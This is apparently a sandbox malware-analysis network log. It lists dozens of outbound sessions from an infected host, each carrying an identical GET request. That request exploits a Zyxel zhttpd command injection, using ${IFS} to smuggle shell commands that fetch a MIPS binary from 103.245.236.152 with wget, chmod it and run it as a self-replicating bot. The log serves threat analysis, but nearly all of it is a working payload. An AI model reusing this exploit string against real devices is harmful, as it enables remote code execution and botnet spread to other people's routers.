                                        Jan 14, 2024 16:18:58.784379959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8227192.168.2.1358452205.255.99.126443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.784440041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8228192.168.2.1340208194.199.166.184443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.784522057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8229192.168.2.1334672165.24.34.52443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.784579992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8230192.168.2.1355030155.170.96.159443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.784646988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8231192.168.2.135767213.189.136.163443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.784672976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8232192.168.2.1337752182.179.89.34443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.784754038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8233192.168.2.1352984101.119.155.24443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.784780025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8234192.168.2.1338512135.191.82.240443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.784843922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8235192.168.2.1345040121.239.205.74443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.784904957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8236192.168.2.134861050.30.239.146443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.784948111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8237192.168.2.134751093.150.133.118443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.785023928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8238192.168.2.1352154197.80.140.2443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.785048008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8239192.168.2.1352876205.192.95.245443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.785089016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8240192.168.2.1360218133.138.53.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.785125971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8241192.168.2.134154895.69.121.50443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.785197973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8242192.168.2.1345744117.60.252.187443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.785228014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8243192.168.2.1347076140.109.80.233443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.785284996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8244192.168.2.135595643.166.243.30443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.785336971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8245192.168.2.1355258166.11.62.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.785391092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8246192.168.2.1352490121.226.235.8443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.785444975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8247192.168.2.1351730146.45.166.211443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.785479069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8248192.168.2.1355586196.102.150.130443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.785521984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8249192.168.2.135946014.63.69.254443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.785578966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8250192.168.2.1360306149.103.21.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.785631895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8251192.168.2.1349588157.16.33.116443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.785661936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8252192.168.2.1342830205.80.44.47443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.785715103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8253192.168.2.135413441.28.199.204443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.785763025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8254192.168.2.1340070150.91.168.118443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.785799980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8255192.168.2.1355794219.19.68.124443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.785857916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8256192.168.2.135181240.125.74.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.785906076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8257192.168.2.1359386156.238.85.242443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.785958052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8258192.168.2.1360770207.70.211.136443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.786000967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8259192.168.2.133812294.211.34.34443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.786075115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8260192.168.2.1353316147.253.151.43443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.786133051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8261192.168.2.1360538188.120.194.165443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.786185980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8262192.168.2.1344534126.77.149.73443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.786271095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8263192.168.2.13472524.236.248.145443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.786338091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8264192.168.2.1356956148.198.42.109443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.786371946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8265192.168.2.134141693.254.116.52443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.786448956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8266192.168.2.1344822144.61.21.148443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.786474943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8267192.168.2.1342226140.66.118.243443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.786547899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8268192.168.2.1348858134.235.216.105443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.786576033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8269192.168.2.1340730161.192.99.216443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.786631107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8270192.168.2.1343508195.153.130.209443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.786676884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8271192.168.2.133748889.38.3.42443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.786755085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8272192.168.2.135603232.242.53.118443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.786819935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8273192.168.2.135605896.155.217.1443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.786875963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8274192.168.2.1335426204.17.69.138443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.786907911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8275192.168.2.1354678156.152.26.189443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.786955118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8276192.168.2.1352310138.252.4.230443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.786990881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8277192.168.2.134400668.141.174.39443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.787040949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8278192.168.2.1346662147.177.242.52443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.787091970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8279192.168.2.133478495.89.80.10443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.787126064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8280192.168.2.1344378222.232.75.74443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.787179947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8281192.168.2.1343940168.106.124.158443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.787221909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8282192.168.2.133736837.191.124.85443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.787273884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8283192.168.2.133800837.201.190.76443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.787348032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8284192.168.2.1334424181.255.116.254443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.787395000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8285192.168.2.135312270.93.168.92443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.787475109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8286192.168.2.134322847.10.127.142443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.787511110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8287192.168.2.134517894.228.95.4443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.787549019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8288192.168.2.135449613.153.255.179443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:58.787616014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8289192.168.2.1359436154.210.63.76443
                                        TimestampBytes transferredDirectionData
